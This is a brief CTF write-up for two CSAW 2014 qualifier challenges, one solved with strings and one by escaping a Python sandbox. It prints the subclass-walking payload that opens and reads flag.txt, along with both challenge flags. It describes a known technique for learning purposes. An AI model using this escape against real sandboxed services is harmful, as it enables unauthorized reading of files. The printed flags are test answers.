CSAW CTF 2014 Quals write-up
team r00t, we ended scoring 1250. None of the team members worked for more than half a day, and our team is small, containing 3 members. All lazy people :D
Exploitation - 1: bo
This was a simple problem, or we didn't know how to solve in the way it was meant to be.
As usual as soon as we saw a executable follow the usual procedure -
First, file type
First, file type
> file bo bo; ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not strippedSecond, look for strings-
> strings boWhen we look at the strings. Oh wait is it the flag. Hell Yeah :D
Welcome to CSAW CTF! Time to break out IDA Demo and see what's going on inside me. :] flag{exploitation_is_easy!}
Exploitation - 2: pybabbies
nc 54.165.210.171 12345
Connect the server with that particular port, We found python console showing up.
Afterwards we opened the source file
As we played around with the console
- Found its Python 3.x
- It does not show any returned value.
workaround: Just print the return value.
- Any error the execution will close the connection.
Time to analyse the source code. All the cool module and functions where banned :'(
Checked if there is already a variable with flag or key etc having the
flag. And obviously it wasnt that easy. So, maybe there is a file with
flag.txt or key.txt where the flag is and we have to open it.
As I have already read few blog posts about escaping Python sandbox, It was easy.
Playing around with tuple. Ended with an interesting part -
>>> print(().__class__.__bases__[0].__subclasses__()[40]) <type 'file'>
Now its obvious try opening flag.txt key.txt etc
>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt")) <open file 'flag', mode 'r' at 0x.....>
Wow!!! It worked. Now just go ahead and read the file
Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read()) flag{definitely_not_intro_python}
>>> exit